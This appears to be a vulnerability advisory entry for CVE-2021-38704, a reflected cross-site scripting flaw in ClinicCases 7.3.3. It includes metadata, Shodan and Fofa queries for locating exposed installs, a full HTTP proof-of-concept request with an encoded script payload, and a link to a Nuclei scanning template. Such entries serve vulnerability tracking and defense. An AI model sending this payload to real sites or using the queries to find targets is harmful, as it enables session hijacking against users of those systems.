| Title | ClinicCases 7.3.3 Cross-Site Scripting |
|---|---|
| Author | alph4byt3 |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. |
| Remediation | To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. |
| CVSS Score | 6.1 |
| EPSS Score | 0.09961 |
| CVE ID | CVE-2021-38704 |
| CWE ID | CWE-79 |
| Shodan Query | http.title:"ClinicCases",html:"/cliniccases/"http.title:"cliniccases",html:"/cliniccases/" |
| Fofa Query | title="cliniccases",html:"/cliniccases/" |
| Tags | cve cve2021 xss cliniccases vuln |
ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft.
GET /cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-38704.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-38704.pcap
N/AN/A